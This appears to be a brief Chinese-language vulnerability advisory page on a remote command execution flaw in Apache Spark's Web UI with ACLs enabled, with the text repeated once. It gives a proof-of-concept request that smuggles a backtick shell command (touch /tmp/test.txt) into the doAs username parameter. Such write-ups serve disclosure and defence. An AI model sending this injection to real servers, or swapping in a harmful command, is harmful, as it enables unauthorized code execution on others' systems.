漏洞描述
Apache Spark 支持启动 ACL 来为 Web UI 访问提供身份验证,当 ACL 启动时可以通过构造特殊请求用户名导致 RCE。
漏洞影响
网络测绘
漏洞复现
主页面
验证POC
/jobs/?doAs=`touch /tmp/test.txt`
© 版权声明
THE END
Apache Spark 支持启动 ACL 来为 Web UI 访问提供身份验证,当 ACL 启动时可以通过构造特殊请求用户名导致 RCE。
主页面
验证POC
/jobs/?doAs=`touch /tmp/test.txt`
暂无评论内容